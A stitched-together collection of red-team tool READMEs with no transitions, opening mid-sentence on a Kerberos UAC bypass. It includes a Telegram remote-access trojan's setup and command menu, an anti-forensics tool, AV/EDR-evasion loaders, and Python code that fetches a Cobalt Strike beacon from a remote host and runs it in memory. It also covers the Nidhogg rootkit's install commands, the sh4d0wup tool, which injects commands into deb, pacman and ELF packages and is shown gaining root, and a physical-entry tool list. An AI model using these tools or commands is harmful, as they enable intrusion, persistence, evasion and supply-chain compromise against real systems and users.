KERB-AD-RESTRICTION-ENTRY
, but fill in a fake MachineID.Once you have a service ticket, you can use Kerberos authentication to access Service Control Manager (SCM) Named Pipes or TCP via HOST/HOSTNAME or RPC/HOSTNAME SPN. Note that SCM's Win32 API always uses Negotiate authentication. James Forshaw created a simple POC: SCMUACBypass.cpp, through the two APIs HOOK AcquireCredentialsHandle and InitializeSecurityContextW, the name of the authentication package called by SCM (pszPack age ) to Kerberos to enable the SCM to use Kerberos when authenticating locally.
Now let's take a look at the running effect, as shown in the figure below. First request a ticket for the HOST service of the current server through the asktgs function, and then create a system service through krbscm to gain the SYSTEM privilege.
KRBUACBypass.exe asktgs
KRBUACBypass.exe krbscm
1. git clone https://github.com/machine1337/TelegramRAT.git
2. Now Follow the instructions in HOW TO USE Section.
1. Go to Telegram and search for https://t.me/BotFather
2. Create Bot and get the API_TOKEN
3. Now search for https://t.me/chatIDrobot and get the chat_id
4. Now Go to client.py and go to line 16 and 17 and place API_TOKEN and chat_id there
5. Now run python client.py For Windows and python3 client.py For Linux
6. Now Go to the bot which u created and send command in message field
HELP MENU: Coded By Machine1337
CMD Commands | Execute cmd commands directly in bot
cd .. | Change the current directory
cd foldername | Change to current folder
download filename | Download File From Target
screenshot | Capture Screenshot
info | Get System Info
location | Get Target Location
1. Execute Shell Commands in bot directly.
2. download file from client.
3. Get Client System Information.
4. Get Client Location Information.
5. Capture Screenshot
6. More features will be added
Coded By: Machine1337
Contact: https://t.me/R0ot1337
Anti Forensics Tool For Red Teamers, Used For Erasing Some Footprints In The Post Exploitation Phase.
Reduces Payload Burnout And Increases Detection Countdown. Can Be Used To Test The capabilities of Your Incident Response / Forensics Teams.
Added:
USNJRnl Execution On All Disk Drives.
Unallocated Space ReWriting.
A Bit of Polishing.
https://github.com/Naranbataar/Corrupt
https://github.com/LloydLabs/delete-self-poc
https://github.com/OsandaMalith/WindowsInternals/blob/master/Unload_Minifilter.c
https://stackoverflow.com/users/15168/jonathan-leffler
https://github.com/GiovanniDicanio/WinReg
A fiber is a unit of execution that must be manually scheduled by the application rather than rely on the priority-based scheduling mechanism built into Windows. Fibers are often called lightweight threads. For more detailed information about what are and how fibers work consult the official documentation. Fibers allow to have multiple execution flows in a single thread, each one with its own registers' state and stack. On the other hand, fibers are invisible to the kernel, which makes them a stealthier (and cheaper) method to execute in-memory code than spawning new threads.
One thread can create multiple fibers, and switch between them at desire by calling the SwitchToFiber function. Before that, the current thread itself must have become a fiber by calling ConvertThreadToFiber since only a fiber can create other fibers. Finally, in order to create a fiber that, when scheduled, executes an in-memory code (for example, after reflectively loaded a PE or some shellcode) it is just needed to make a call to CreateFiber.
The SwitchToFiber function is the most important part of this process and where all the magic occurs. This function allows to schedule one fiber or another, all happening on user space. According to the official documentation, "the SwitchToFiber function saves the state information of the current fiber and restores the state of the specified fiber". This mean that when this function is called, the registers' values and the stack are switched from the current fiber state to the target fiber state, allowing to "hide" the stack of the current fiber once the process is completed. This also allows to continue the execution of the target fiber from the same point where the execution was stopped (the same way that it happens when the scheduler switches between threads according to its own priority logic).
And this is exactly what this simple PoC does:
run()
function exported by the manually mapped dll. This fiber will be known as the payload fiber from now on.This process repeats indefinitely.
The use of fibers may be advantageous for some types of payloads (like a C2 beacon) for some of these reasons:
JMP
or CALL
from the loader pointing to unbacked memory regions.Since we are using LITCRYPT plugin to obfuscate string literals, it is required to set up the environment variable LITCRYPT_ENCRYPT_KEY before compiling the code:
C:\Users\User\Desktop\Fiber> set LITCRYPT_ENCRYPT_KEY="yoursupersecretkey"
After that, simply compile both the payload and the loader and run the last one:
C:\Users\User\Desktop\Fiber\payload> cargo build --release
C:\Users\User\Desktop\Fiber\loader> cargo build --release
C:\Users\User\Desktop\Fiber\loader\target\release> loader.exe
There is not much mistery on this PoC execution. All it has to be done is to run the loader and use any tool like ProcessHacker to inspect the thread stack. Since the payload switches back to the control fiber before sleeping, the payload fiber's stack remains hidden most of the time. You will see in the output how the two fibers are consecutively scheduled following the already commented logic.
The code is commented to show how to use, create and schedule fibers. You will notice that both the loader and the payload offered as example are "stuck" on an infinite loop, which allows to indefinitely switch between fibers and continue the execution.
If a different payload wants to be tested, just modify the path located on line 32 of the file src::main.rs of the loader. In that case, the new dll has to export a run(PVOID)
function that will receive as input parameter the address of the control fiber. This function has to switch back to the control fiber in order to call the Sleep function, although you can modify this behavior at will to fit your requirements.
Another way to test this tool with a random payload is to perform IAT hooking to redirect any call to the Sleep function (or any other imported function) made by the payload to a function located on the loader, allowing to switch back to the control fiber when this call occurs. Up to you.
In the following screenshots we can see how the stack of the current threat moves from one private memory region to another as we switch fibers:
"Python memory module" AI generated pic - hotpot.ai
pure-python implementation of MemoryModule technique to load a dll or unmanaged exe entirely from memory
PythonMemoryModule is a Python ctypes porting of the MemoryModule technique originally published by Joachim Bauch. It can load a dll or unmanaged exe using Python without requiring the use of an external library (pyd). It leverages pefile to parse PE headers and ctypes.
The tool was originally thought to be used as a Pyramid module to provide evasion against AV/EDR by loading dll/exe payloads in python.exe entirely from memory, however other use-cases are possible (IP protection, pyds in-memory loading, spinoffs for other stealthier techniques) so I decided to create a dedicated repo.
In the following example a Cobalt Strike stageless beacon dll is downloaded (not saved on disk), loaded in memory and started by calling the entrypoint.
import urllib.request
import ctypes
import pythonmemorymodule
request = urllib.request.Request('http://192.168.1.2/beacon.dll')
result = urllib.request.urlopen(request)
buf=result.read()
dll = pythonmemorymodule.MemoryModule(data=buf, debug=True)
startDll = dll.get_proc_addr('StartW')
assert startDll()
#dll.free_library()
Note: if you use staging in your malleable profile the dll would not be able to load with LoadLibrary, hence MemoryModule won't work.
Using the MemoryModule technique will mostly respect the sections' permissions of the target DLL and avoid the noisy RWX approach. However within the program memory there will be a private commit not backed by a dll on disk and this is a MemoryModule telltale.
Nidhogg is a multi-functional rootkit for red teams. The goal of Nidhogg is to provide an all-in-one and easy-to-use rootkit with multiple helpful functionalities for red team engagements that can be integrated with your C2 framework via a single header file with simple usage, you can see an example here.
Nidhogg can work on any version of x64 Windows 10 and Windows 11.
This repository contains a kernel driver with a C++ header to communicate with it.
Since version v0.3, Nidhogg can be reflectively loaded with kdmapper but because PatchGuard will be automatically triggered if the driver registers callbacks, Nidhogg will not register any callback. Meaning, that if you are loading the driver reflectively these features will be disabled by default:
These are the features known to me that will trigger PatchGuard, you can still use them at your own risk.
It has a very simple usage, just include the header and get started!
#include "Nidhogg.hpp"
int main() {
HANDLE hNidhogg = CreateFile(DRIVER_NAME, GENERIC_WRITE | GENERIC_READ, 0, nullptr, OPEN_EXISTING, 0, nullptr);
// ...
DWORD result = Nidhogg::ProcessUtils::NidhoggProcessProtect(pids);
// ...
}
To compile the client, you will need to install CMake and Visual Studio 2022 installed and then just run:
cd <NIDHOGG PROJECT DIRECTORY>\Example
mkdir build
cd build
cmake ..
cmake --build .
To compile the project, you will need the following tools:
Clone the repository and build the driver.
To test it in your testing environment run those commands with elevated cmd:
bcdedit /set testsigning on
After rebooting, create a service and run the driver:
sc create nidhogg type= kernel binPath= C:\Path\To\Driver\Nidhogg.sys
sc start nidhogg
To debug the driver in your testing environment run this command with elevated cmd and reboot your computer:
bcdedit /debug on
After the reboot, you can see the debugging messages in tools such as DebugView.
Thanks a lot to those people that contributed to this project:
This tool is a simple PoC of how to hide memory artifacts using a ROP chain in combination with hardware breakpoints. The ROP chain will change the main module memory page's protections to N/A while sleeping (i.e. when the function Sleep is called). For more detailed information about this memory scanning evasion technique check out the original project Gargoyle. x64 only.
The idea is to set up a hardware breakpoint in kernel32!Sleep and a new top-level filter to handle the exception. When Sleep is called, the exception filter function set before is triggered, allowing us to call the ROP chain without the need of using classic function hooks. This way, we avoid leaving weird and unusual private memory regions in the process related to well known dlls.
The ROP chain simply calls VirtualProtect() to set the current memory page to N/A, then calls SleepEx and finally restores the RX memory protection.
The overview of the process is as follows:
This process repeats indefinitely.
As it can be seen in the image, the main module's memory protection is changed to N/A while sleeping, which avoids memory scans looking for pages with execution permission.
Since we are using LITCRYPT plugin to obfuscate string literals, it is required to set up the environment variable LITCRYPT_ENCRYPT_KEY before compiling the code:
C:\Users\User\Desktop\RustChain> set LITCRYPT_ENCRYPT_KEY="yoursupersecretkey"
After that, simply compile the code and run the tool:
C:\Users\User\Desktop\RustChain> cargo build
C:\Users\User\Desktop\RustChain\target\debug> rustchain.exe
This tool is just a PoC and some extra features should be implemented in order to be fully functional. The main purpose of the project was to learn how to implement a ROP chain and integrate it within Rust. Because of that, this tool will only work if you use it as it is, and failures are expected if you try to use it in other ways (for example, compiling it to a dll and trying to reflectively load and execute it).
NTLMRecon is a Golang version of the original NTLMRecon utility written by Sachin Kamath (AKA pwnfoo). NTLMRecon can be leveraged to perform brute forcing against a targeted webserver to identify common application endpoints supporting NTLM authentication. This includes endpoints such as the Exchange Web Services endpoint which can often be leveraged to bypass multi-factor authentication.
The tool supports collecting metadata from the exposed NTLM authentication endpoints including information on the computer name, Active Directory domain name, and Active Directory forest name. This information can be obtained without prior authentication by sending an NTLM NEGOTIATE_MESSAGE packet to the server and examining the NTLM CHALLENGE_MESSAGE returned by the targeted server. We have also published a blog post alongside this tool discussing some of the motiviations behind it's development and how we are approaching more advanced metadata collectoin within Chariot.
We wanted to perform brute-forcing and automated identification of exposed NTLM authentication endpoints within Chariot, our external attack surface management and continuous automated red teaming platform. Our primary backend scanning infrastructure is written in Golang and we didn't want to have to download and shell out to the NTLMRecon utility in Python to collect this information. We also wanted more control over the level of detail of the information we collected, etc.
The following command can be leveraged to install the NTLMRecon utility. Alternatively, you may download a precompiled version of the binary from the releases tab in GitHub.
go install github.com/praetorian-inc/NTLMRecon/cmd/NTLMRecon@latest
The following command can be leveraged to invoke the NTLM recon utility and discover exposed NTLM authentication endpoints:
NTLMRecon -t https://autodiscover.contoso.com
The following command can be leveraged to invoke the NTLM recon utility and discover exposed NTLM endpoints while outputting collected metadata in a JSON format:
NTLMRecon -t https://autodiscover.contoso.com -o json
Below is an example JSON output with the data we collect from the NTLM CHALLENGE_MESSAGE returned by the server:
{
"url": "https://autodiscover.contoso.com/EWS/",
"ntlm": {
"netbiosComputerName": "MSEXCH1",
"netbiosDomainName": "CONTOSO",
"dnsDomainName": "na.contoso.local",
"dnsComputerName": "msexch1.na.contoso.local",
"forestName": "contoso.local"
}
}
โ ~ NTLMRecon -t https://adfs.contoso.com -o json | jq
{
"url": "https://adfs.contoso.com/adfs/services/trust/2005/windowstransport",
"ntlm": {
"netbiosComputerName": "MSFED1",
"netbiosDomainName": "CONTOSO",
"dnsDomainName": "corp.contoso.com",
"dnsComputerName": "MSEXCH1.corp.contoso.com",
"forestName": "contoso.com"
}
}
โ ~ NTLMRecon -t https://autodiscover.contoso.com
https://autodiscover.contoso.com/Autodiscover
https://autodiscover.contoso.com/Autodiscover/AutodiscoverService.svc/root
https://autodiscover.contoso.com/Autodiscover/Autodiscover.xml
https://autodiscover.contoso.com/EWS/
https://autodiscover.contoso.com/OAB/
https://autodiscover.contoso.com/Rpc/
โ ~
Our methodology when developing this tool has targeted the most barebones version of the desired capability for the initial release. The goal for this project was to create an initial tool we could integrate into Chariot and then allow community contributions and feedback to drive additional tooling improvements or functionality. Below are some ideas for additional functionality which could be added to NTLMRecon:
[1] https://www.praetorian.com/blog/automating-the-discovery-of-ntlm-authentication-endpoints/
% docker run -it --rm ghcr.io/kpcyrd/sh4d0wup:edge -h
Usage: sh4d0wup [OPTIONS] <COMMAND>
Commands:
bait Start a malicious update server
front Bind a http/https server but forward everything unmodified
infect High level tampering, inject additional commands into a package
tamper Low level tampering, patch a package database to add malicious packages, cause updates or influence dependency resolution
keygen Generate signing keys with the given parameters
sign Use signing keys to generate signatures
hsm Interact with hardware signing keys
build Compile an attack based on a plot
check Check if the plot can still execute correctly against the configured image
req Emulate a http request to test routing and selectors
completion s Generate shell completions
help Print this message or the help of the given subcommand(s)
Options:
-v, --verbose... Increase logging output (can be used multiple times)
-q, --quiet... Reduce logging output (can be used multiple times)
-h, --help Print help information
-V, --version Print version information
Have you ever wondered if the update you downloaded is the same one everybody else gets or did you get a different one that was made just for you? Shadow updates are updates that officially don't exist but carry valid signatures and would get accepted by clients as genuine. This may happen if the signing key is compromised by hackers or if a release engineer with legitimate access turns grimy.
sh4d0wup
is a malicious http/https update server that acts as a reverse proxy in front of a legitimate server and can infect + sign various artifact formats. Attacks are configured in plots
that describe how http request routing works, how artifacts are patched/generated, how they should be signed and with which key. A route can have selectors
so it matches only if eg. the user-agent matches a pattern or if the client is connecting from a specific ip address. For development and testing, mock signing keys/certificates can be generated and marked as trusted.
Some plots are more complex to run than others, to avoid long startup time due to downloads and artifact patching, you can build a plot in advance. This also allows to create signatures in advance.
sh4d0wup build ./contrib/plot-hello-world.yaml -o ./plot.tar.zst
This spawns a malicious http update server according to the plot. This also accepts yaml files but they may take longer to start.
sh4d0wup bait -B 0.0.0.0:1337 ./plot.tar.zst
You can find examples here:
contrib/plot-archlinux.yaml
contrib/plot-debian.yaml
contrib/plot-rustup.yaml
contrib/plot-curl-sh.yaml
sh4d0wup infect elf
% sh4d0wup infect elf /usr/bin/sh4d0wup -c id a.out
[2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Spawning C compiler...
[2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Generating source code...
[2022-12-19T23:50:57Z INFO sh4d0wup::infect::elf] Waiting for compile to finish...
[2022-12-19T23:51:01Z INFO sh4d0wup::infect::elf] Successfully generated binary
% ./a.out help
uid=1000(user) gid=1000(user) groups=1000(user),212(rebuilderd),973(docker),998(wheel)
Usage: a.out [OPTIONS] <COMMAND>
Commands:
bait Start a malicious update server
infect High level tampering, inject additional commands into a package
tamper Low level tampering, patch a package database to add malicious packages, cause updates or influence dependency resolution
keygen Generate signing keys with the given parameters
sign Use signing keys to generate signatures
hsm Intera ct with hardware signing keys
build Compile an attack based on a plot
check Check if the plot can still execute correctly against the configured image
completions Generate shell completions
help Print this message or the help of the given subcommand(s)
Options:
-v, --verbose... Turn debugging information on
-h, --help Print help information
sh4d0wup infect pacman
% sh4d0wup infect pacman --set 'pkgver=0.2.0-2' /var/cache/pacman/pkg/sh4d0wup-0.2.0-1-x86_64.pkg.tar.zst -c id sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
[2022-12-09T16:08:11Z INFO sh4d0wup::infect::pacman] This package has no install hook, adding one from scratch...
% sudo pacman -U sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
loading packages...
resolving dependencies...
looking for conflicting packages...
Packages (1) sh4d0wup-0.2.0-2
Total Installed Size: 13.36 MiB
Net Upgrade Size: 0.00 MiB
:: Proceed with installation? [Y/n]
(1/1) checking keys in keyring [#######################################] 100%
(1/1) checking package integrity [#######################################] 100%
(1/1) loading package files [#######################################] 100%
(1/1) checking for file conflic ts [#######################################] 100%
(1/1) checking available disk space [#######################################] 100%
:: Processing package changes...
(1/1) upgrading sh4d0wup [#######################################] 100%
uid=0(root) gid=0(root) groups=0(root)
:: Running post-transaction hooks...
(1/2) Arming ConditionNeedsUpdate...
(2/2) Notifying arch-audit-gtk
sh4d0wup infect deb
% sh4d0wup infect deb /var/cache/apt/archives/apt_2.2.4_amd64.deb -c id ./apt_2.2.4-1_amd64.deb --set Version=2.2.4-1
[2022-12-09T16:28:02Z INFO sh4d0wup::infect::deb] Patching "control.tar.xz"
% sudo apt install ./apt_2.2.4-1_amd64.deb
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Note, selecting 'apt' instead of './apt_2.2.4-1_amd64.deb'
Suggested packages:
apt-doc aptitude | synaptic | wajig dpkg-dev gnupg | gnupg2 | gnupg1 powermgmt-base
Recommended packages:
ca-certificates
The following packages will be upgraded:
apt
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 0 B/1491 kB of archives.
After this operation, 0 B of additional disk space will be used.
Get:1 /apt_2.2.4-1_amd64.deb apt amd64 2.2.4-1 [1491 kB]
debconf: de laying package configuration, since apt-utils is not installed
(Reading database ... 6661 files and directories currently installed.)
Preparing to unpack /apt_2.2.4-1_amd64.deb ...
Unpacking apt (2.2.4-1) over (2.2.4) ...
Setting up apt (2.2.4-1) ...
uid=0(root) gid=0(root) groups=0(root)
Processing triggers for libc-bin (2.31-13+deb11u5) ...
sh4d0wup infect oci
Here's a short oneliner on how to take the latest commit from a git repository, send it to a remote computer that has sh4d0wup installed to tweak it until the commit id starts with the provided --collision-prefix
and then inserts the new commit back into the repository on your local computer:
% git cat-file commit HEAD | ssh lots-o-time nice sh4d0wup tamper git-commit --stdin --collision-prefix 7777 --strip-header | git hash-object -w -t commit --stdin
This may take some time, eventually it shows a commit id that you can use to create a new branch:
git show 777754fde8...
git branch some-name 777754fde8...
๏ซ[Disclaimer]: Use of this project is for Educational/ Testing purposes only. Using it on unauthorised machines is strictly forbidden. If somebody is found to use it for illegal/ malicious intent, author of the repo will not be held responsible.
ย
Install PRAW library in python3:
pip3 install praw
See the Quickstart guide on how to get going right away!
Below is a demonstration of the XOR-encrypted C2 traffic for understanding purposes:
Since it is a custom C2 Implant, it doesn't get detected by any AV as the bevahiour is completely legit.
Special thanks to @T4TCH3R for working with me and contributing to this project.
In this list I decided to share most of the tools I utilize in authorized engagements, including where to find some of them, and in some cases I will also include some other alternative tools. I am not providing information on how to use these tools, since this information can be found online with some research. My goal with this list is to help fellow Red Teamers with a 'checklist', for whenever they might be missing a tool, and use this list as a reference for any engagement. Stay safe and legal!!
Recon Tool | Where to find | Alternative |
---|---|---|
1. Camera with high zoom | Recommended: Panasonic Lumix FZ-80 with 60x Zoom Camera | Alternative: If not the Panasonic, you can use others. There are many other good cameras in the market. Try to get one with a decent zoom, any camera with over 30x Optical Zoom should work just fine. |
1.1 Polarized Camera Filters | Recommended: Any polarized filter that fits the lens of your camera. | Alternatives: N/A. |
2. Body Worn Action Camera | Recommended: GoPro cameras or the DJI Osmo Action cameras | Alternatives: There are other cheaper alternative action cameras that can be used, however the videos may not have the highest quality or best image stabilization, which can make the footage seem wobbly or too dark. |
3. Drone with Camera | Recommended: DJI Mavic Mini Series or any other drone that fits your budget. | N/A |
4. Two-Way Radios or Walkie Talkies | Recommended: BaoFeng UV-5R | Alternatives would be to just use cellphones and bluetooth headsets and a live call, however with this option you will not be able to listen to local radio chatter. A cell phone serves the purpose of being able to communicate with the client in case of emergency. |
5. Reliable flashlight | Amazon, Ebay, local hardware store | If you want to save some money, you can always use the flashlight of your cellphone, however some phones cant decrease the brightness intensity. |
6. Borescope / Endoscope | Recommended: USB Endoscope Camera | There are a few other alternatives, varying in price, size, and connectivity. |
7. RFID Detector | Recommended: One good benefit of the Dangerous Things RFID Diagnostics Card is that its the size of a credit card, so it fits perfectly in your wallet for EDC use. | Cheaper Alternative: The RF Detector by ProxGrind can be used as a keychain. |
8. Alfa AWUS036ACS 802.11ac | Recommended: Alfa AWUS036ACS | N/A |
9. CANtenna | N/A | Yagi Antennas also work the same way. |
LockPicking & Entry Tools | Recommended | Alternatives |
---|---|---|
10. A reliable ScrewDriver with changeable bits | Recommended: Wera Kraftform | Alternative: Any other screwdriver set will work just fine. Ideally a kit which can be portable and with different bits |
11. A reliable plier multitool | Recommended: Gerber Plier Multitool | Alternatives: any reliable multitool of your preference |
12. Gaffer Tape | Recommended because of its portability: Red Team Tools Gaffer Tape | Alternatives: There are many other options on Amazon, but they are all larger in size. |
13. A reliable set of 0.025 thin lockpick set | Recommended to get a well known brand with good reputation and quality products. Some of those are: TOOOL, Sparrows, SouthOrd, Covert Instruments | N/A. You do not want a pick breaking inside of a client's lock. Avoid sets that are of unknown brands from ebay. |
14. A reliable set of 0.018 thin lockpick set | Recommended to get a well known brand with good reputation and quality products. Some of those are: TOOOL, Sparrows, SouthOrd, Covert Instruments | N/A. |
15. Tension bars | Recommended: Covert Instruments Ergo Turner Set or Sparrows Flatbars | There are many other alternatives, varying in sizes and lengths. I strongly recommend having them in varying widths. |
16. Warded picks | Recommended: Red Team Tools Warded Lock Picks | Alternative: Sparrows Warded Pick Set |
17. Comb picks | Recommended: Covert Instruments Quad Comb Set | Alternative options: Sparrows Comb .45 and the Red Team Tools Comb Picks |
18. Wafer picks | Recommended: Red Team Tools Wafer Picks | Alternatives: Sparrows Warded & Wafer Picks with Case |
19. Jigglers | Recommended: Red Team Tools Jiggler | Alternatives: Sparrows Coffin Keys |
20. Dimple lockpicks | Recommended: Sparrows Black Flag | Alternatives: The "Lishi" of Dimple locks Dangerfield Multi-Dimple Lock Picking Tool - 'The Gamechanger' |
21. Tubular lockpicks | Recommended: Red Team Tools Quick-Connect Tubular Lockpick | Alternative: If you are very skilled at picking, you can go the manual route of tensioning and single pin picking, but it will take a lot longer to open the lock. With the Sparrows Goat Wrench you are able to do so. |
22. Disk Pick | Recommended: Sparrows Disk Pick | N/A |
23. Lock Lubricant | Powdered Graphite found on Ebay or Amazon can get the job done. | N/A |
24. Plug spinner | Recommended: Red Team Tools Peterson Plug Spinner | Alternative: LockPickWorld GOSO Pen Style Plug Spinner |
25. Hinge Pin Removal Tool | Recommended: Red Team Tools Hammerless Hinge Pin Tool | Here are some other alternatives: Covert Instruments Hinge Pin Removal Tools |
26. PadLock Shims | Recommended: Red Team Tools Padlock Shims 5-Pack | Alternative: Covert Instruments Padlock Shims 20-pack |
27. Combination lock decoders | Recommended: Covert Instruments Decoder Bundle | Alternative: Sparrows Ultra Decoder |
28. Commercial door hook or Adams Rite | Recommended: Covert Instruments Commercial Door Hook | Alternative: Red Team Tools "Peterson Tools Adams Rite Bypass Wire" or the Sparrows Adams Rite Bypass Driver |
29. Lishi Picks | IYKYK | N/A |
30. American Lock Bypass Driver | Recommended: Red Team Tools American Lock Padlock Bypass Driver | Alternative: Sparrows Padlock Bypass Driver |
31. Abus Lock Bypass Driver | Recommended: N/A | N/A |
Bypass Tools | Recommended | Alternatives |
---|---|---|
32. Travelers hook | Both Red Team Tools Travelers Hook and Covert Instruments Travelers Hook are solid options. | N/A |
33. Under Door Tool "UDT" | Recommended: Sparrows UDT | Alternative: Red Team Tools UDT |
34. Camera film | Recommended: Red Team Tools Film Canister | N/A |
35. Jim tool | Recommended: Sparrows Quick Jim | Alternative: Red Team Tools Rescue Jim |
36. Crash bar tool "DDT" | Recommended: Sparrows DDT | Alternative: Serepick DDT |
37. Deadbolt Thumb Turn tool | Recommended: Both Covert Instruments J tool and Red Team Tools J Tool are solid options | N/A |
38. Door Latch shims | Recommended: Red Team Tools Mica Door Shims | Alternative: Covert Instruments Mica Door Shims |
39. Strong Magnet | Recommended: N/A | The MagSwitches. Quick search online and you will find them. |
40. Bump Keys | Recommended: Sparrows Bump Keys | N/A |
41. Seattle RAT "SEA-RAT" | Recommended: Seattle Rapid Access Tool | Alternative: I've heard of the use of piano wire also, but I have not used it myself. IYKYK |
42. Air Wedge | Recommended: Covert Instruments Air Wedge | N/A |
43. Can of Compressed Air | Recommended: Red Team Tools Air Canister Nozzle Head | Cans of compressed air, usually found at your local stores |
44. Proxmark3 RDV4 | Recommended: Red Team Tools Proxmark RDV4 | Alternative: Hacker Warehouse Proxmark3 RDV4 |
45. General use keys | Recommended: Hooligan Keys - Devious, Troublesome, Hooligan! | N/A |
46. Alarm panels, Cabinets, other keys | Recommended: Hooligan Keys | Covert Instruments keys |
47. Elevator Keys | Recommended: Sparrows Fire Service Elevator Key Set | N/A |
Implants | Recommended | Alternatives |
---|---|---|
48. Rubber Ducky or Bash Bunny | Recommended: HAK5 USB Rubber Ducky and the HAK5 Bash Bunny | Alternatives: The USB Digispark. |
49. DigiSpark | No recommended links at the moment, but often found on overseas online sellers. | Its a cheaper alternative to the Rubber Ducky or the Bash Bunny.Read more. |
50. Lan Turtle | HAK5 Lan Turtle | N/A |
51. Shark Jack | Recommended: HAK5 Shark Jack | N/A |
52. Key Croc | Recommended: HAK5 Key Croc | N/A |
53. Wi-Fi Pineapple | Recommended: HAK5 WiFi Pineapple | N/A |
54. O.MG Plug | Recommended: HAK5 O.MG Plug | N/A |
55. ESPKey | Recommended: Red Team Tools ESPKey | N/A |
EDC Tools | Recommended | Alternatives |
---|---|---|
56. Pwnagotchi | Recommended to build. Pwnagotchi Website. | N/A |
57. Covert Belt | Recommended: Security Travel Money Belt | N/A |
58. Bogota LockPicks | Recommended for EDC: Bogota PI | N/A |
59. Dog Tag Entry Tool set | Recommended: Black Scout Survival Dog Tag | N/A |
60. Sparrows Wallet EDC Kit | Recommended: Sparrows Chaos Card; Sparrows Chaos Card: Wary Edition; Sparrows Shimmy Card; Sparrows Flex Pass; Sparrows Orion Card | N/A |
61. SouthOrd Jackknife | Recommended: SouthOrd Jackknife | Alternative: SouthOrd Pocket Pen Pick Set |
62. Covert Companion | Recommended: Covert Instruments - Covert Companion | N/A |
63. Covert Companion Turning Tools | Recommended: Covert Instruments - Turning Tools | N/A |
Additional Tools | Recommended | Alternatives |
---|---|---|
64. Ladders | Easy to carry ladders, for jumping over fences and walls. | N/A |
65. Gloves | Thick comfortable gloves, Amazon has plenty of them. | N/A |
66. Footwear | It varies, depending if social engineering or not. If in the open field, use boots. | N/A |
67. Attire | Dress up depending on the engagement. If in the field, use rugged strong clothes. If in an office building, dress accordingly. | N/A |
68. Thick wool blanket | At least a 5x5 and 1 inch thick, or barbed wires will shred you. | N/A |
69. First Aid Kit | Many kits available on Amazon. | N/A |
Suppliers or Cool sites to check | Website | N/A |
---|---|---|
Sparrows Lock Picks | https://www.sparrowslockpicks.com/ | N/A |
Red Team Tools | https://www.redteamtools.com/ | N/A |
Covert Instruments | https://covertinstruments.com/ | N/A |
Serepick | https://www.serepick.com/ | N/A |
Hooligan Keys | https://www.hooligankeys.com | N/A |
SouthOrd | https://www.southord.com/ | N/A |
Hak5 | https://shop.hak5.org/ | N/A |
Sneak Technology | https://sneaktechnology.com/ | N/A |
Dangerous Things | https://dangerousthings.com/ | N/A |
LockPickWorld | https://www.lockpickworld.com/ | N/A |
TIHK | https://tihk.co/ | N/A |
Lost Art Academy | https://lostartacademy.com/ | N/A |
Toool | https://www.toool.us/ | N/A |
More coming soon! | More coming soon! | N/A |